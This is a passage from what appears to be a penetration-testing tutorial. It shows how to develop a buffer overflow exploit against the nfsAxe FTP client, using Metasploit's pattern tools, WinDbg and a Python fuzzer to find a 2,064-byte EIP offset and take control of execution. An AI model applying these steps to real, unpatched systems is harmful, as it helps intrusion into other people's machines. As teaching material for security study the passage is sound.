Head on over to the tools directory in Metasploit with cd /usr/share/metasploit-framework/tools. First, let's generate a 4,000-byte payload, as we know that's enough bytes to overwrite critical parts of memory:
# ./pattern_create.rb -l 4000 > /root/fuzz.txt
After a couple of seconds, this new text file will appear in your home directory. If you open it up, you'll see 3,000 bytes of junk. Don't be so fast to judge, though – it's a specially crafted string that the offset finder, pattern_offset.rb, will use to find where our sweet spot lies.
Now, open your fuzzer with Vim again and comment out the lines that take input and set the fuzz variable. Add this line after the comment lines:
with open("fuzz.txt") as fuzzfile:
fuzz = fuzzfile.read().rstrip("
")
Note that rstrip() simply trims the new line from the end of the file:
Save your modified fuzzer and execute it again. You'll notice the payload is now 4,000 bytes long. But hold your horses—let's not fire off the FTP client just yet (we already know it'll crash). As we reviewed in Chapter 9, Weaponizing Python, let's link our FTP client to WinDbg: while the nfsAxe client is running, run the command line and find the FTP client's PID with the task list. When you have it – 3304 in our example – execute windbg -p 3304 -g to attach WinDbg to the process in graphical mode:
Now, you're ready to connect to the fuzzer. After the 4,000 bytes are received by the client, it crashes – but we can see the EIP register is overwritten with 0x43387143. The manual fuzzer in you is anticipating something like 0x41414141 or 0x7a7a7a7a, but don't forget that we're using a unique pattern to find our offset, shown as follows:
I know what the hacker in you is saying right now: we're on an Intel processor, so that's a little-endian EIP address, isn't it? Not bad, young apprentice. So then, 0x43387143 is really 43 71 38 43. A quick lookup on a hexadecimal ASCII table shows us the pattern: Cq8C. Hold on to that value for the offset calculation with pattern_offset.rb:
# ./pattern_offset.rb --length 4000 --query Cq8C
As you can see, pattern_offset knows what to look for within a given length provided to pattern_create.
I know what you're wondering because I wondered the same thing: does the offset include the 4 bytes that overwrite the return address? In other words, if the offset is found to be 2,064 bytes, do we need to put in 2,060 bytes of fluff? Once again, the friendly neighborhood hackers at Metasploit considered that and decided to make it consistent. What you see is what you need in your exploit code. So, we'll go back to our Python script one more time and multiply our junk byte by the exact offset value discovered by pattern_offset, and then concatenate the hex string of the memory location to which execution will flow:
fuzz = 'x7a' * 2064 + 'xefxbexadxde'
Fire it off one more time and watch the EIP (also the Exception Offset: in the Windows error message). Congratulations! You have all the pieces needed to construct a working exploit:
